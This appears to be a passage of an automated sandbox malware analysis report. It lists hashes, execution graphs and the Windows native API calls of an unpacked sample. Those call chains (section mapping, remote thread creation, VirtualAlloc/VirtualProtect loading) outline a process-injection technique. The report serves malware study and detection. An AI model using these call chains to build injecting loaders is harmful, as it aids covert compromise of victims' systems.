                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction Fuzzy Hash: EC3148B6900609DFDB14CF99C880BAEBBF9FF48324F15504AD841A7390D7B1EA45CBA4
                                                                        Function 00403277 Relevance: .1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc34d4c504682f2768a018a8d1fde695c1ca4eb9710677e8b81438df22d49140
                                                                        • Instruction ID: 21332e02fe08d71e2d2fffb8962b9a12b04fceda92f261c8de33ffcba1ea84f6
                                                                        • Opcode Fuzzy Hash: dc34d4c504682f2768a018a8d1fde695c1ca4eb9710677e8b81438df22d49140
                                                                        • Instruction Fuzzy Hash: C64158A191D6938FEB535A3448D60E27FA9E96335331845FFC441EA5C7E23E4B03825A
                                                                        Function 0040324F Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                                                        • Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
                                                                        • Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                                                        • Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F
                                                                        Function 00403256 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                                                        • Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
                                                                        • Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                                                        • Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E
                                                                        Function 00403247 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                                                        • Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
                                                                        • Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                                                        • Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F
                                                                        Function 0040326C Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                        • Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
                                                                        • Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                        • Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E
                                                                        Function 0266F20B Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction ID: 462ddb0c0d891abfaf7b668c3e140b9cb3c0f520e0d1922a52c7d74fc628237d
                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction Fuzzy Hash: 08117C76340100AFDB44DF95ECC5FA673EEEB89260B198169E909CB716D675E802CBA0
                                                                        Function 00403290 Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                        • Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
                                                                        • Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                        • Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A
                                                                        Function 02600D90 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction ID: d10e995d2db6a1428a3ef6daa5930c0b608f74a31719e55c82f14bd61f557778
                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction Fuzzy Hash: 6901A276A106048FDF25CF24C884BAB33E9EB86216F4544A5D90AA73C2E774A9818B90

                                                                        Execution Graph

                                                                        Execution Coverage:7.7%
                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:122
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 3472 402e40 3475 402e37 3472->3475 3473 402edf 3475->3473 3476 4018e6 3475->3476 3477 4018f5 3476->3477 3478 40192e Sleep 3477->3478 3479 401949 3478->3479 3481 40195a 3479->3481 3482 401514 3479->3482 3481->3473 3483 401524 3482->3483 3484 4015c4 NtDuplicateObject 3483->3484 3488 4016e0 3483->3488 3485 4015e1 NtCreateSection 3484->3485 3484->3488 3486 401661 NtCreateSection 3485->3486 3487 401607 NtMapViewOfSection 3485->3487 3486->3488 3490 40168d 3486->3490 3487->3486 3489 40162a NtMapViewOfSection 3487->3489 3488->3481 3489->3486 3491 401648 3489->3491 3490->3488 3492 401697 NtMapViewOfSection 3490->3492 3491->3486 3492->3488 3493 4016be NtMapViewOfSection 3492->3493 3493->3488 3593 401542 3594 40153b 3593->3594 3595 4015c4 NtDuplicateObject 3594->3595 3599 4016e0 3594->3599 3596 4015e1 NtCreateSection 3595->3596 3595->3599 3597 401661 NtCreateSection 3596->3597 3598 401607 NtMapViewOfSection 3596->3598 3597->3599 3601 40168d 3597->3601 3598->3597 3600 40162a NtMapViewOfSection 3598->3600 3600->3597 3602 401648 3600->3602 3601->3599 3603 401697 NtMapViewOfSection 3601->3603 3602->3597 3603->3599 3604 4016be NtMapViewOfSection 3603->3604 3604->3599 3589 26dea85 3590 26deaa5 3589->3590 3591 26df236 3 API calls 3590->3591 3592 26deaae 3591->3592 3513 252003c 3514 2520049 3513->3514 3526 2520e0f SetErrorMode SetErrorMode 3514->3526 3519 2520265 3520 25202ce VirtualProtect 3519->3520 3522 252030b 3520->3522 3521 2520439 VirtualFree 3525 25204be LoadLibraryA 3521->3525 3522->3521 3524 25208c7 3525->3524 3527 2520223 3526->3527 3528 2520d90 3527->3528 3529 2520dad 3528->3529 3530 2520dbb GetPEB 3529->3530 3531 2520238 VirtualAlloc 3529->3531 3530->3531 3531->3519 3652 402dd0 3654 402ddc 3652->3654 3653 4018e6 8 API calls 3655 402edf 3653->3655 3654->3653 3654->3655 3570 4018f1 3571 4018f6 3570->3571 3572 40192e Sleep 3571->3572 3573 401949 3572->3573 3574 401514 7 API calls 3573->3574 3575 40195a 3573->3575 3574->3575 3532 2520001 3533 2520005 3532->3533 3538 252092b GetPEB 3533->3538 3535 2520030 3540 252003c 3535->3540 3539 2520972 3538->3539 3539->3535 3541 2520049 3540->3541 3542 2520e0f 2 API calls 3541->3542 3543 2520223 3542->3543 3544 2520d90 GetPEB 3543->3544 3545 2520238 VirtualAlloc 3544->3545 3546 2520265 3545->3546 3547 25202ce VirtualProtect 3546->3547 3549 252030b 3547->3549 3548 2520439 VirtualFree 3552 25204be LoadLibraryA 3548->3552 3549->3548 3551 25208c7 3552->3551 3639 401915 3640 40191a 3639->3640 3641 4018c6 3639->3641 3642 40192e Sleep 3640->3642 3643 401949 3642->3643 3644 401514 7 API calls 3643->3644 3645 40195a 3643->3645 3644->3645 3494 402f97 3495 4030ee 3494->3495 3496 402fc1 3494->3496 3496->3495 3497 40307c RtlCreateUserThread NtTerminateProcess 3496->3497 3497->3495 3553 2520005 3554 252092b GetPEB 3553->3554 3555 2520030 3554->3555 3556 252003c 7 API calls 3555->3556 3557 2520038 3556->3557 3498 26dea96 3499 26deaa5 3498->3499 3502 26df236 3499->3502 3507 26df251 3502->3507 3503 26df25a CreateToolhelp32Snapshot 3504 26df276 Module32First 3503->3504 3503->3507 3505 26deaae 3504->3505 3506 26df285 3504->3506 3509 26deef5 3506->3509 3507->3503 3507->3504 3510 26def20 3509->3510 3511 26def69 3510->3511 3512 26def31 VirtualAlloc 3510->3512 3511->3511 3512->3511 3629 402d7b 3631 402d38 3629->3631 3630 4018e6 8 API calls 3632 402dc7 3630->3632 3631->3629 3631->3630 3631->3632 3576 4014fe 3577 401506 3576->3577 3578 401531 3576->3578 3579 4015c4 NtDuplicateObject 3578->3579 3583 4016e0 3578->3583 3580 4015e1 NtCreateSection 3579->3580 3579->3583 3581 401661 NtCreateSection 3580->3581 3582 401607 NtMapViewOfSection 3580->3582 3581->3583 3585 40168d 3581->3585 3582->3581 3584 40162a NtMapViewOfSection 3582->3584 3584->3581 3586 401648 3584->3586 3585->3583 3587 401697 NtMapViewOfSection 3585->3587 3586->3581 3587->3583 3588 4016be NtMapViewOfSection 3587->3588 3588->3583

                                                                        Executed Functions

                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 123 40168d-401691 119->123 120->119 122 40162a-401646 NtMapViewOfSection 120->122 122->119 125 401648-40165e 122->125 123->105 126 401697-4016b8 NtMapViewOfSection 123->126 125->119 126->105 128 4016be-4016da NtMapViewOfSection 126->128 128->105 129 4016e0 call 4016e5 128->129
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 170 40168d-401691 166->170 167->166 169 40162a-401646 NtMapViewOfSection 167->169 169->166 172 401648-40165e 169->172 170->152 173 401697-4016b8 NtMapViewOfSection 170->173 172->166 173->152 175 4016be-4016da NtMapViewOfSection 173->175 175->152 176 4016e0 call 4016e5 175->176
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 214 40168d-401691 210->214 211->210 213 40162a-401646 NtMapViewOfSection 211->213 213->210 216 401648-40165e 213->216 214->196 217 401697-4016b8 NtMapViewOfSection 214->217 216->210 217->196 219 4016be-4016da NtMapViewOfSection 217->219 219->196 220 4016e0 call 4016e5 219->220
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 253 40168d-401691 249->253 250->249 252 40162a-401646 NtMapViewOfSection 250->252 252->249 255 401648-40165e 252->255 253->235 256 401697-4016b8 NtMapViewOfSection 253->256 255->249 256->235 258 4016be-4016da NtMapViewOfSection 256->258 258->235 259 4016e0 call 4016e5 258->259
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 293 40168d-401691 289->293 290->289 292 40162a-401646 NtMapViewOfSection 290->292 292->289 295 401648-40165e 292->295 293->275 296 401697-4016b8 NtMapViewOfSection 293->296 295->289 296->275 298 4016be-4016da NtMapViewOfSection 296->298 298->275 299 4016e0 call 4016e5 298->299
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                        Function 0252003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 252003c-2520047 1 2520049 0->1 2 252004c-2520263 call 2520a3f call 2520e0f call 2520d90 VirtualAlloc 0->2 1->2 17 2520265-2520289 call 2520a69 2->17 18 252028b-2520292 2->18 23 25202ce-25203c2 VirtualProtect call 2520cce call 2520ce7 17->23 20 25202a1-25202b0 18->20 22 25202b2-25202cc 20->22 20->23 22->20 29 25203d1-25203e0 23->29 30 25203e2-2520437 call 2520ce7 29->30 31 2520439-25204b8 VirtualFree 29->31 30->29 33 25205f4-25205fe 31->33 34 25204be-25204cd 31->34 37 2520604-252060d 33->37 38 252077f-2520789 33->38 36 25204d3-25204dd 34->36 36->33 41 25204e3-2520505 36->41 37->38 39 2520613-2520637 37->39 42 25207a6-25207b0 38->42 43 252078b-25207a3 38->43 44 252063e-2520648 39->44 54 2520517-2520520 41->54 55 2520507-2520515 41->55 45 25207b6-25207cb 42->45 46 252086e-25208be LoadLibraryA 42->46 43->42 44->38 48 252064e-252065a 44->48 47 25207d2-25207d5 45->47 53 25208c7-25208f9 46->53 50 25207d7-25207e0 47->50 51 2520824-2520833 47->51 48->38 52 2520660-252066a 48->52 57 25207e2 50->57 58 25207e4-2520822 50->58 60 2520839-252083c 51->60 59 252067a-2520689 52->59 61 2520902-252091d 53->61 62 25208fb-2520901 53->62 56 2520526-2520547 54->56 55->56 63 252054d-2520550 56->63 57->51 58->47 64 2520750-252077a 59->64 65 252068f-25206b2 59->65 60->46 66 252083e-2520847 60->66 62->61 68 25205e0-25205ef 63->68 69 2520556-252056b 63->69 64->44 70 25206b4-25206ed 65->70 71 25206ef-25206fc 65->71 72 252084b-252086c 66->72 73 2520849 66->73 68->36 74 252056f-252057a 69->74 75 252056d 69->75 70->71 76 252074b 71->76 77 25206fe-2520748 71->77 72->60 73->46 78 252059b-25205bb 74->78 79 252057c-2520599 74->79 75->68 76->59 77->76 84 25205bd-25205db 78->84 79->84 84->63
                                                                        APIs
